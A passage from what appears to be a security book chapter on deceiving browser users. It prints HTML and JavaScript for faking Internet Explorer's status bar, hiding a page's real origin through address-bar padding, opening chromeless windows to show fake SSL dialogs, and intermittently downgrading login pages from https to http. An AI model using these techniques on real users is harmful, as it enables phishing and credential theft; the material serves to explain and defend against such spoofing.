Most of these techniques would port to the document models of other browsers, but why bother when IE has taken over 90 percent of the Web? Variability is actually one of the major defenses against these attacks: precisely because we can so easily predict what the user is used to seeing, we have a straightforward way of faking out their expectations. Interestingly enough, the skin support of Windows XP is actually a very positive step toward defending against this style of attack; if you can’t remotely query what skin a user is running, you can’t remotely spoof their “window dressing.”
On the flip side, Internet Explorer 6’s mysterious trait of “forgetting” to keep the status bar active does tend to make the task of spoofing it moderately unnecessary (though an attacker still needs to guess whether or not to spoof something).
For once, the classic rejoinder is almost accurate: “It’s not a bug, it’s a feature.”
Notes from the Underground…
[root@fire x10]# cat webcache.html
<html>
<head>
<title>You think that's SSL you're parsing?</title>
</head>
<frameset rows="*,20" frameborder="0" framespacing="0" topmargin="0"
leftmargin="0" rightmargin="0" marginwidth="0" marginheight="0">
<frame src="encap.html">
<frame src="bottom.html" height=20 scrolling="no" frameborder="0"
marginwidth="0" marginheight="0" noresize="yes">
</frameset>
<body>
</body>
</html>
The height of the status bar is exactly 20 pixels, and none of the standard frame decorations are wanted, so we just disable all of them. Now, the contents of bottom.html will be rendered in the exact position of the original status bar. Let’s see what bottom.html looks like:
[root@fire x10]# cat bottom.html
<HTML>
<body bgcolor=#3267CD topmargin="0" leftmargin="0">
<TABLE CELLSPACING="0" CELLPADDING="0" VALIGN="bottom">
<TR ALIGN=center>
<TD><IMG hspace="0" vspace="0" ALIGN="left" SRC="left.gif"></TD>
<TD WIDTH=90%><IMG hspace="0" vspace="0" VALIGN="bottom" WIDTH=500 HEIGHT=20 SRC="midsmall.gif"></TD>
<TD><IMG hspace="0" vspace="0" ALIGN="right" SRC="right.gif"></TD>
</TR>
</TABLE>
</BODY>
</HTML>
If you think of a status bar, at least under Internet Explorer, here’s about what it’s composed of: a unique little pane on the left, a mostly blank space in the middle, and some fields on the right. So we copy the necessary patterns of pixels and spit them back out as needed. (The middle field is stretched by a fixed amount; there are methods in HTML to make the bar stretch left and right with the window itself, but they’re unneeded in this case.) By mimicking the surrounding environment, we spoof user expectations about who is providing the status bar: the user expects the system to be providing those pixels, but they’re just another part of the Web page.
A Whole New Kind of Buffer Overflow: Risks of Right-Justification
This is just painfully bad. You may have noted an extraordinary number of apparently random variables in the URL that popup_ie.html calls. We’re not just going to request http://www.doxpara.com/x10/webcache.html, we’re going to request
http://www.doxpara.com/x10/webcache.html?site=https://www.x10.com/hotnewsale/webaccessid=xyqx1412&netlocation=241&block=121&pid=81122&&sid=1. The extra material is ignored by the browser and is merely sent to the Web server as ancillary information for its logs. No ancillary information is really needed (it’s a static Web page, for crying out loud), but the client doesn’t know that we have a much different purpose for it: for each character you toss on past what the window can contain, the text field containing the address loses a character on the left side. Because we set the size of the address bar indirectly when we specified a window size in popup_ie.html, and because the font used for the address bar is virtually fixed (except on unusual browsers, which can be filtered out by their uniformly polluted outgoing HTTP headers), it’s a reasonably straightforward matter of trial and error to specify the exact number and style of characters needed to delete the actual source of the Web page, in this case http://www.doxpara.com/x10. We just put on enough garbage variables and, poof, it just looks like yet another page with too many variables exposed to the outside world.
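The padding trick can be sketched in a few lines of JavaScript. This is not code from the original pages: the padUrl helper, its garbage parameter names, and the 80-character address-bar width are assumptions for illustration.

```javascript
// Sketch only: pad a URL with throwaway query parameters so that a
// fixed-width address bar right-justifies the real origin out of view.
function padUrl(realUrl, decoyQuery, addressBarChars) {
  // Start with the real URL plus the decoy "site=" material the victim
  // is meant to read once the left side scrolls away.
  let url = realUrl + "?" + decoyQuery;
  // Append throwaway key=value pairs until the total length comfortably
  // exceeds what the address bar can display. The browser ignores them;
  // the server merely logs them.
  let i = 0;
  while (url.length < realUrl.length + addressBarChars) {
    url += "&pad" + i + "=" + i;
    i++;
  }
  return url;
}

const spoofed = padUrl(
  "http://www.doxpara.com/x10/webcache.html",
  "site=https://www.x10.com/hotnewsale/",
  80 // assumed visible width of the popup's address bar, in characters
);
```

Exactly how many characters to pad is the trial-and-error step the text describes; the constant here just has to exceed the visible width.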
Individually, each of these problems is just a small contributor. But when combined, they’re deadly. Figure 12.2 illustrates what the user sees; Figure 12.3 illustrates what’s really happening.
Total Control: Spoofing Entire Windows
One of the interesting security features built into early, non–MS Java Virtual Machines was a specification that all untrusted windows had to have a status bar notifying the user that a given dialog box was actually being run by a remote server and wasn’t in fact reflecting the local system.
The lack of this security feature was one of the more noticeable omissions in Microsoft’s Java environments.
Some systems remain configured to display a quick notification dialog box when transitioning to a secure site. This notification looks something like Figure 12.4.
Unfortunately, this is just another array of pixels, and using the “chromeless pop-up” features of Internet Explorer, such pixels can be spoofed with ease; witness the fake pop-up ad shown in Figure 12.5.
Figure 12.3 The Faked Pop-Up Ad Revealed
Figure 12.4 Explicit SSL Notification Dialog Box
That’s not an actual window, and small signs give it away (the antialiased text in the title bar, for example), but it’s enough. This version is merely a graphic, but HTML, Java, and especially Flash are rich enough tools to spoof an entire GUI, or at least one window at a time. You trust pixels; the Web gives pixels. In this case, you expect extra pixels to differentiate the Web’s content from your system’s; by bug or by design, there are methods of removing your system’s pixels, leaving the Web to do what it will. (In this case, all that was needed was to set two options against each other: First, the fullscreen=1 variable was set in the popup function, increasing the size of the window and removing the borders. Then a second, contradictory set of options was added: resizable=0, plus an explicitly enumerated height and width. The resizing of fullscreen mode got cancelled, but the borders were already stripped; by bug or by design, the result was a chromeless window all ready for fake chrome to be slathered on.)
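As a sketch, the contradictory feature string described above might be built like this. The chromelessFeatures helper and the file name in the comment are invented for illustration, and the chrome-stripping side effect is the IE-era behavior the text describes, long since fixed in modern browsers.

```javascript
// Sketch of the option collision described above (assumed IE 5/6-era
// behavior; modern browsers ignore fullscreen=1 from script).
function chromelessFeatures(width, height) {
  return [
    "fullscreen=1",    // requests fullscreen, stripping borders and title bar
    "resizable=0",     // contradicts fullscreen's implicit resize...
    "width=" + width,  // ...and these pin the window to our own geometry
    "height=" + height
  ].join(",");
}

// In a browser, the spoofed dialog would then be opened as:
//   window.open("fake_ssl_notice.html", "spoof", chromelessFeatures(380, 150));
const features = chromelessFeatures(380, 150);
```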
Attacking SSL through Intermittent Failures
Occasionally, we end up overthinking a problem—yes, it’s possible to trick a user into thinking they’re in a secure site. But you don’t always need to work so hard.
What if, 1 out of every 1,000 times somebody tried to log in to a bank or stockbroker through its Web page, the login screen was not routed through SSL?
Would there be an error? In a sense. The address bar would definitely be missing the s in https, and the 16×16-pixel lock would be gone. But that’s it, just that once; a single reload would redirect back to https.
Would anybody ever catch this error?
Figure 12.5 Arbitrary Web-Supplied Notification Dialog Box
Might somebody call up tech support and complain, and be told anything other than “reload the page and see if the problem goes away?”
The problem stems from the fact that not all traffic can be either encrypted or authenticated. There’s no way for a page itself to securely load while saying, “If I’m not encrypted, scream to the user not to give me his secret information.” (Even if there were, the fact that the page was unauthenticated would mean an attacker could easily strip this flag off.) The user’s willingness to read unencrypted and unauthenticated traffic means that anyone able to capture his connection and spoof content from his bank or brokerage could prevent the delivered page from mentioning its insecure status anyway.
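To see how little work such an attacker needs to do, here is an illustrative sketch of the intermittent downgrade. Everything in it (the helper name, the 1-in-N counter, the naive regex rewrite) is an assumption for the example, not code from the text; a real in-path attacker would rewrite live HTTP responses.

```javascript
// Illustrative sketch: an in-path attacker who downgrades only a small
// fraction of login pages, so the "error" never repeats on reload.
function makeIntermittentStripper(rate) {
  let count = 0;
  return function (html) {
    count++;
    // Most of the time, pass the page through untouched so nothing looks odd.
    if (count % rate !== 0) return html;
    // On the unlucky request, rewrite secure references so credentials
    // travel in the clear; a single reload "fixes" it.
    return html.replace(/https:\/\//g, "http://");
  };
}

const strip = makeIntermittentStripper(1000);
```

The victim who reloads gets the untouched page back, which is exactly why tech support will never see the problem reproduced.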
NOTE
The best solution will probably end up involving adding a lock under and/or to the right of the mouse pointer whenever a secure page is being navigated. It’s small enough to be moderately unobtrusive, doesn’t interrupt the data flow, communicates important information, and (most importantly) is directly in the field of view at the moment a secured link receives information from the browser. Of course, we’d have to worry about things like Comet Cursor allowing even the mouse cursor to be spoofed…so the arms race would continue.
In Pixels We Trust: The Honest Truth
“Veblen proposed that the psychology of prestige was driven by three ‘pecuniary canons of taste’: conspicuous leisure, conspicuous consumption, and conspicuous waste. Status symbols are flaunted and coveted not necessarily because they are useful or attractive (pebbles, daisies, and pigeons are quite beautiful, as we rediscover when they delight young children), but often because they are so rare, wasteful, or pointless that only the wealthy can afford them.
They include clothing that is too delicate, bulky, constricting, or stain-prone to work in, objects too fragile for casual use or made from unobtainable materials, functionless objects made with prodigious labor, decorations that consume energy, and pale skin in lands where the plebeians work the fields and suntans in lands where they work indoors. The logic is: You can’t see all my wealth and earning power (my bank account, my lands, all my allies and flunkeys), but you can see my gold bathroom fixtures. No one could afford them without wealth to spare, therefore you know I am wealthy.”
—Steven Pinker, “How the Mind Works”
Let’s be honest: It isn’t the tiny locks and the little characters in the right places that we trust. There are sites that appear professional, and there are sites that look like they were made by a 13-year-old with a pirated copy of Photoshop and a very special problem with Ritalin. Complaining about the presumptions people might form based on appearances alone does tend to ignore the semicryptographic validity of those presumptions: there’s an undeniable asymmetry to elegance and class. It’s much easier to recognize than it is to generate.
But the analogy to the real world does break down: Although it is indeed difficult to create an elegant site, especially one with a significant amount of backend dynamic programming evident (yes, that’s why dynamic content impresses), it’s trivial to copy any limited amount of its functionality and appearance. We don’t actually trust the pixels along the borders telling us whether a site is secure or not. We’re really looking at the design itself, even though just about anyone can rip off any design he or she likes and slap it onto any domain he or she gets access to.
(Of course, the access to domains is an issue—note the wars for domain names.)
Down and Dirty: Engineering